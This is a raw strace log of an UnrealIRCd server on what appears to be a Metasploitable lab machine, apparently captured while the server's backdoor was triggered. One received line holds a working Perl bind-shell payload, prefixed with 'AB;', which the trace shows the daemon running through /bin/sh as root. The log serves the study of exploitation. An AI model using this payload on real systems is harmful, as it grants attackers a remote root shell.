4519  20:18:00.909485 select(1024, [2 3 4 7 9], [], NULL, {0, 990000}) = 1 (in [9], left {0, 890000})
4519  20:18:01.009493 clock_gettime(CLOCK_MONOTONIC, {48290, 826510731}) = 0
4519  20:18:01.009512 recv(9, "PRIVMSG  #testit2 ABCDEFGHIJKLMNOPQRSTUVWXYZ\n", 8192, 0) = 45
4519  20:18:01.009542 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:01.009560 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:01.009575 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:01.009589 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:01.009603 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:01.009617 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:01.009630 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:01.009644 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:01.009690 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:01.009723 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:01.009736 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:01.009750 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:01.009764 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:01.009777 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:01.009791 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:01.009804 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:01.009817 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:01.009831 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:01.009844 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:01.009858 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:01.009872 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:01.009885 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:01.009901 time(NULL)        = 1495671481
4519  20:18:01.009910 time(NULL)        = 1495671481
4519  20:18:01.009923 gettimeofday({1495671481, 9927}, NULL) = 0
4519  20:18:01.009934 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)
4519  20:18:01.009963 clock_gettime(CLOCK_MONOTONIC, {48290, 826976403}) = 0
4519  20:18:01.009974 gettimeofday({1495671481, 9977}, NULL) = 0
4519  20:18:01.009985 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [9], left {0, 920000})
4519  20:18:01.090110 clock_gettime(CLOCK_MONOTONIC, {48290, 907130669}) = 0
4519  20:18:01.090131 recv(9, "PRIVMSG  #testit2 ABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ\n", 8192, 0) = 71
4519  20:18:01.090157 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:01.090175 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:01.090189 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:01.090203 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:01.090217 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:01.090232 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:01.090245 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:01.090259 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:01.090272 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:01.090286 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:01.090308 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:01.090322 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:01.090335 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:01.090349 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:01.090363 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:01.090376 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:01.090389 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:01.090403 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:01.090417 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:01.090431 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:01.090444 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:01.090458 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:01.090475 gettimeofday({1495671481, 90508}, NULL) = 0
4519  20:18:01.090517 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [9], left {0, 370000})
4519  20:18:01.719477 clock_gettime(CLOCK_MONOTONIC, {48291, 536498383}) = 0
4519  20:18:01.719500 recv(9, "USERIP bla4\n", 8192, 0) = 12
4519  20:18:01.719523 send(9, ":irc.Metasploitable.LAN 340 bla4 :bla4=-bla4@127.0.0.1    \r\n", 60, 0) = 60
4519  20:18:01.719543 time(NULL)        = 1495671481
4519  20:18:01.719554 time(NULL)        = 1495671481
4519  20:18:01.719565 gettimeofday({1495671481, 719568}, NULL) = 0
4519  20:18:01.719576 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)
4519  20:18:01.719605 clock_gettime(CLOCK_MONOTONIC, {48291, 536618389}) = 0
4519  20:18:01.719616 gettimeofday({1495671481, 719619}, NULL) = 0
4519  20:18:01.719626 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [2], left {0, 930000})
4519  20:18:01.792226 clock_gettime(CLOCK_MONOTONIC, {48291, 609246484}) = 0
4519  20:18:01.792247 accept(2, 0, NULL) = 5
4519  20:18:01.792270 getpeername(5, {sa_family=AF_INET, sin_port=htons(38407), sin_addr=inet_addr("10.0.2.4")}, [16]) = 0
4519  20:18:01.792302 fcntl64(5, F_GETFL) = 0x2 (flags O_RDWR)
4519  20:18:01.792315 fcntl64(5, F_SETFL, O_RDWR|O_NONBLOCK) = 0
4519  20:18:01.792329 setsockopt(5, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0
4519  20:18:01.792341 setsockopt(5, SOL_SOCKET, SO_RCVBUF, [8192], 4) = 0
4519  20:18:01.792383 setsockopt(5, SOL_SOCKET, SO_SNDBUF, [8192], 4) = 0
4519  20:18:01.792413 getsockopt(5, SOL_IP, IP_OPTIONS, "", [0]) = 0
4519  20:18:01.792426 setsockopt(5, SOL_IP, IP_OPTIONS, NULL, 0) = 0
4519  20:18:01.792442 clock_gettime(CLOCK_MONOTONIC, {48291, 609456111}) = 0
4519  20:18:01.792455 socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 6
4519  20:18:01.792467 fcntl64(6, F_GETFL) = 0x2 (flags O_RDWR)
4519  20:18:01.792491 fcntl64(6, F_SETFL, O_RDWR|O_NONBLOCK) = 0
4519  20:18:01.792500 fcntl64(6, F_SETFD, FD_CLOEXEC) = 0
4519  20:18:01.792511 connect(6, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, 16) = 0
4519  20:18:01.792526 send(6, "\210\263\1\0\0\1\0\0\0\0\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1", 39, MSG_NOSIGNAL) = 39
4519  20:18:01.792615 accept(2, 0, NULL) = -1 EAGAIN (Resource temporarily unavailable)
4519  20:18:01.792688 gettimeofday({1495671481, 792697}, NULL) = 0
4519  20:18:01.792707 select(1024, [2 3 4 6 7 9], [], NULL, {1, 0}) = 1 (in [6], left {0, 990000})
4519  20:18:01.800689 clock_gettime(CLOCK_MONOTONIC, {48291, 617723045}) = 0
4519  20:18:01.800723 recvfrom(6, "\210\263\201\203\0\1\0\0\0\1\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1\300\22\0\6\0\1\0\0\1#\0A\10prisoner\4iana\3org\0\nhostmaster\froot-servers\300AwsD\225\0\0\7\10\0\0\3\204\0\t:\200\0\t:\200", 513, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, [16]) = 116
4519  20:18:01.800773 close(6)          = 0
4519  20:18:01.800800 recvfrom(-1, 0xbfbaddf7, 513, 0, 0xbfbadff8, 0xbfbaddf0) = -1 EBADF (Bad file descriptor)
4519  20:18:01.800815 send(5, ":irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...\r\n:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn\'t resolve your hostname; using your IP address instead\r\n", 174, 0) = 174
4519  20:18:01.800875 time(NULL)        = 1495671481
4519  20:18:01.800888 time(NULL)        = 1495671481
4519  20:18:01.800920 gettimeofday({1495671481, 800924}, NULL) = 0
4519  20:18:01.800946 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)
4519  20:18:01.800975 clock_gettime(CLOCK_MONOTONIC, {48291, 617988274}) = 0
4519  20:18:01.800986 gettimeofday({1495671481, 800990}, NULL) = 0
4519  20:18:01.800997 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [4], left {0, 680000})
4519  20:18:02.119533 clock_gettime(CLOCK_MONOTONIC, {48291, 936552689}) = 0
4519  20:18:02.119554 recv(4, "PRIVMSG  #testit0 Hiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii\n", 8192, 0) = 55
4519  20:18:02.119577 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:02.119594 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:02.119609 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:02.119623 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:02.119636 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:02.119650 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:02.119663 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:02.119676 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:02.119689 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:02.119702 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:02.119715 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:02.119728 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:02.119741 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:02.119754 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:02.119767 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:02.119781 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:02.119794 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:02.119807 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:02.119820 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:02.119834 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:02.119847 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:02.119860 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 140000}, ...}) = 0
4519  20:18:02.119938 gettimeofday({1495671482, 119943}, NULL) = 0
4519  20:18:02.119970 select(1024, [2 3 4 5 7 9], [], NULL, {1, 0}) = 1 (in [5], left {1, 0})
4519  20:18:02.120025 clock_gettime(CLOCK_MONOTONIC, {48291, 937037355}) = 0
4519  20:18:02.120036 recv(5, "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n", 8192, 0) = 244
4519  20:18:02.120063 rt_sigaction(SIGINT, {SIG_IGN}, {0x8062280, [HUP INT], 0}, 8) = 0
4519  20:18:02.120084 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0
4519  20:18:02.120096 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
4519  20:18:02.120110 clone(child_stack=0, flags=CLONE_PARENT_SETTID|SIGCHLD, parent_tidptr=0xbfbae034) = 11567
11567 20:18:02.120221 rt_sigaction(SIGINT, {0x8062280, [HUP INT], 0}, NULL, 8) = 0
11567 20:18:02.120236 rt_sigaction(SIGQUIT, {SIG_IGN}, NULL, 8) = 0
11567 20:18:02.120246 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
11567 20:18:02.120259 execve("/bin/sh", ["sh", "-c", "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n"], [/* 14 vars */]) = 0
11567 20:18:02.120416 brk(0)            = 0x80f9000
11567 20:18:02.120469 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
11567 20:18:02.129777 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f8c000
11567 20:18:02.129777 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
11567 20:18:02.129778 open("/etc/ld.so.cache", O_RDONLY) = 1
11567 20:18:02.129778 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0
11567 20:18:02.129778 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f84000
11567 20:18:02.129778 close(1)          = 0
11567 20:18:02.129779 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
11567 20:18:02.129779 open("/lib/libncurses.so.5", O_RDONLY) = 1
11567 20:18:02.129779 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\200\220\0\0004\0\0\0h\344\2\0\0\0\0\0004\0 \0\4\0(\0\32\0\31\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0T\305\2\0T\305\2\0\5\0\0\0\0\20\0\0\1\0\0\0T\305\2\0T\325\2\0T\325\2\0004\36\0\0 \"\0\0\6\0\0\0\0\20\0\0\2\0\0\0\34\335\2\0\34\355\2\0\34\355\2\0\330\0\0\0\330\0\0\0\6\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0\t\2\0\0&\2\0\0z\1\0\0L\0\0\0\0\0\0\0\0\0\0\0\25\0\0\0\333\1\0\0\0\0\0\0\0\0\0\0\t\2\0\0\20\2\0\0E\1\0\0\0\0\0\0\0\0\0\0T\0\0\0\367\1\0\0\0\0\0\0\0\0\0\0\306\1\0\0L\1\0\0\203\0\0\0\236\1\0\0\0\0\0\0\0\0\0\0\320\0\0\0005\0\0\0\233\1\0\0\375\0\0\0\265\0\0\0\0\0\0\0\267\0\0\0\0\0\0\0\246\1\0\0\33\1\0\0\300\1\0\0\356\0\0\0\223\0\0\0@\1\0\0\365\1\0\0\23\2\0\0O\0\0\0\303\1\0\0\0\0\0\0\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\225\0\0\0|\0\0\0\0\0\0\0x\0\0\0\364\1\0\0\0\0\0\0\21\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0^\1\0\0\0\0\0\0\22\2\0\0\0\0\0\0\371\0\0\0\33\0\0\0f\0\0\0\37\1\0\0\222\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\354\0\0\0\261\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\36\2\0\0\0\0\0\0\5\0\0\0\364\0\0\0\0\0\0\0R\0\0\0", 512) = 512
11567 20:18:02.129779 fstat64(1, {st_mode=S_IFREG|0644, st_size=190584, ...}) = 0
11567 20:18:02.129798 mmap2(NULL, 194420, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f54000
11567 20:18:02.129810 mmap2(0xb7f81000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x2c) = 0xb7f81000
11567 20:18:02.129827 close(1)          = 0
11567 20:18:02.129838 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
11567 20:18:02.129852 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1
11567 20:18:02.129916 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512
11567 20:18:02.130058 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0
11567 20:18:02.130075 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f50000
11567 20:18:02.130086 mmap2(0xb7f52000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f52000
11567 20:18:02.130101 close(1)          = 0
11567 20:18:02.130112 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
11567 20:18:02.130126 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1
11567 20:18:02.130140 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512
11567 20:18:02.130226 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0
11567 20:18:02.130242 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f4f000
11567 20:18:02.130256 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e00000
11567 20:18:02.130266 mmap2(0xb7f49000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7f49000
11567 20:18:02.130280 mmap2(0xb7f4c000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f4c000
11567 20:18:02.130294 close(1)          = 0
11567 20:18:02.130315 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7dff000
11567 20:18:02.130327 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7dff6b0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0
11567 20:18:02.130431 mprotect(0xb7f49000, 4096, PROT_READ) = 0
11567 20:18:02.130500 munmap(0xb7f84000, 29913) = 0
11567 20:18:02.130526 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0
11567 20:18:02.130540 open("/dev/tty", O_RDWR|O_NONBLOCK|O_LARGEFILE) = -1 ENXIO (No such device or address)
11567 20:18:02.130559 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbf9fdbc0) = -1 ENOTTY (Inappropriate ioctl for device)
11567 20:18:02.130589 brk(0)            = 0x80f9000
11567 20:18:02.130598 brk(0x80fa000)    = 0x80fa000
11567 20:18:02.130610 brk(0x80fb000)    = 0x80fb000
11567 20:18:02.130626 getuid32()        = 0
11567 20:18:02.130635 getgid32()        = 0
11567 20:18:02.130643 geteuid32()       = 0
11567 20:18:02.130652 getegid32()       = 0
11567 20:18:02.130666 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0
11567 20:18:02.130679 time(NULL)        = 1495671482
11567 20:18:02.130692 brk(0x80fc000)    = 0x80fc000
11567 20:18:02.130706 brk(0x80fd000)    = 0x80fd000
11567 20:18:02.130725 open("/proc/meminfo", O_RDONLY) = 1
11567 20:18:02.130746 fstat64(1, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0
11567 20:18:02.130764 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f8b000
11567 20:18:02.130776 read(1, "MemTotal:      1035240 kB\nMemFree:        168080 kB\nBuffers:        141364 kB\nCached:         482664 kB\nSwapCached:          0 kB\nActive:         505880 kB\nInactive:       306988 kB\nHighTotal:      131008 kB\nHighFree:          248 kB\nLowTotal:       904232 kB\nLowFree:        167832 kB\nSwapTotal:           0 kB\nSwapFree:            0 kB\nDirty:            1108 kB\nWriteback:           0 kB\nAnonPages:      188872 kB\nMapped:          52040 kB\nSlab:            32580 kB\nSReclaimable:    20164 kB\nSUnreclaim:      12416 kB\nPageTables:       2900 kB\nNFS_Unstable:        0 kB\nBounce:              0 kB\nCommitLimit:    517620 kB\nCommitted_AS:   707968 kB\nVmallocTotal:   118776 kB\nVmallocUsed:      3420 kB\nVmallocChunk:   114760 kB\nHugePages_Total:     0\nHugePages_Free:      0\nHugePages_Rsvd:      0\nHugePages_Surp:      0\nHugepagesize:     2048 kB\n", 1024) = 846
11567 20:18:02.130910 close(1)          = 0
11567 20:18:02.130927 munmap(0xb7f8b000, 4096) = 0
11567 20:18:02.130957 brk(0x80fe000)    = 0x80fe000
11567 20:18:02.130983 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0
11567 20:18:02.131033 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0
11567 20:18:02.131064 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0
11567 20:18:02.131111 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0
11567 20:18:02.131140 rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_IGN}, 8) = 0
11567 20:18:02.131171 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0
11567 20:18:02.131220 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0
11567 20:18:02.131233 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0
11567 20:18:02.131279 uname({sys="Linux", node="metasploitable", ...}) = 0
11567 20:18:02.131499 stat64("/", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
11567 20:18:02.131553 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0
11567 20:18:02.131608 brk(0x8100000)    = 0x8100000
11567 20:18:02.131640 getcwd("/etc/unreal", 4096) = 12
11567 20:18:02.131671 getpid()          = 11567
11567 20:18:02.131721 getppid()         = 4519
11567 20:18:02.131759 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0
11567 20:18:02.131780 stat64("/sbin/sh", 0xbf9fdb98) = -1 ENOENT (No such file or directory)
